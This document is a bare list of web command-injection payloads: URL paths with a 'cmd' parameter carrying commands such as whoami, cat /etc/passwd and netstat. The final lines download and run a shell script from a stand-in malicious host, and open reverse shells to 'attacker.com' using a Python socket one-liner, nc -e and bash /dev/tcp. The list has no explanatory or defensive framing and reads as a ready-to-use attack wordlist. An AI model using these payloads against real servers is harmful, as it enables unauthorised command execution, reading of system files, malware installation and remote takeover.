/admin?cmd=whoami
/debug.php?cmd=ls
/console?cmd=cat /etc/passwd
/system?cmd=ping -c 4 127.0.0.1
/tools?cmd=uname -a
/shell?cmd=id
/adminpanel?cmd=ls -l
/dev?cmd=cat /var/log/syslog
/api?cmd=ifconfig
/service?cmd=netstat -an
/controlpanel?cmd=ps aux
/command?cmd=uptime
/admin-console?cmd=whoami
/debugger?cmd=ls -al
/terminal?cmd=cat /etc/hosts
/remote?cmd=wget http://malicious-site.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh
/shell_access?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
/reverse_shell?cmd=nc -nv attacker.com 4444 -e /bin/bash
/debug_shell?cmd=bash -i >& /dev/tcp/attacker.com/4444 0>&1
